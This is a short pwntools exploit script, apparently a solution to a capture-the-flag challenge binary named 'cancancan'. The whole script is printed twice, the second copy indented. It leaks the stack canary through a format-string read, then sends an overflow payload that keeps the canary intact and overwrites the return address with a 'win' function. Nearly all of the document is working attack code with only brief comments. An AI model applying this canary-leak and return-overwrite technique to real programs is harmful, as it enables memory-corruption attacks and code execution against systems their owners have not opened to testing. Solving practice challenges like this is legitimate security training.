luckythandel/exploit.py

## exploit.py
#!/usr/bin/env python3
from pwn import *
context.arch = 'i386'

'''
we saw that there is a format string vulnerability. so, it is easy to get the stack cookie value and add it in a proper way to
successfully over write the value of return pointer.
'''
canary_format_str = "%31$p" # format string for canary.
win = p32(0x08049236) # win function
io = process('./cancancan')

#canary
io.recvline('can you bypass me???')
io.sendline(canary_format_str.encode())
canary = eval(io.recv().decode().strip())
log.info("Canary: {}".format(hex(canary)))

#ret overwrite
offset = 116 # return pointer is at 116 bytes away from the input buffer.
padding =  b"A"*100
payload = padding+p32(canary) # add the stack canary in the payload to its proper position so that stack check may not failed.
payload = payload+b"A"*(116-len(payload))+win
io.sendline(payload)
io.interactive()
	#!/usr/bin/env python3
	from pwn import *
	context.arch = 'i386'

	'''
	we saw that there is a format string vulnerability. so, it is easy to get the stack cookie value and add it in a proper way to
	successfully over write the value of return pointer.
	'''
	canary_format_str = "%31$p" # format string for canary.
	win = p32(0x08049236) # win function
	io = process('./cancancan')

	#canary
	io.recvline('can you bypass me???')
	io.sendline(canary_format_str.encode())
	canary = eval(io.recv().decode().strip())
	log.info("Canary: {}".format(hex(canary)))

	#ret overwrite
	offset = 116 # return pointer is at 116 bytes away from the input buffer.
	padding = b"A"*100
	payload = padding+p32(canary) # add the stack canary in the payload to its proper position so that stack check may not failed.
	payload = payload+b"A"*(116-len(payload))+win
	io.sendline(payload)
	io.interactive()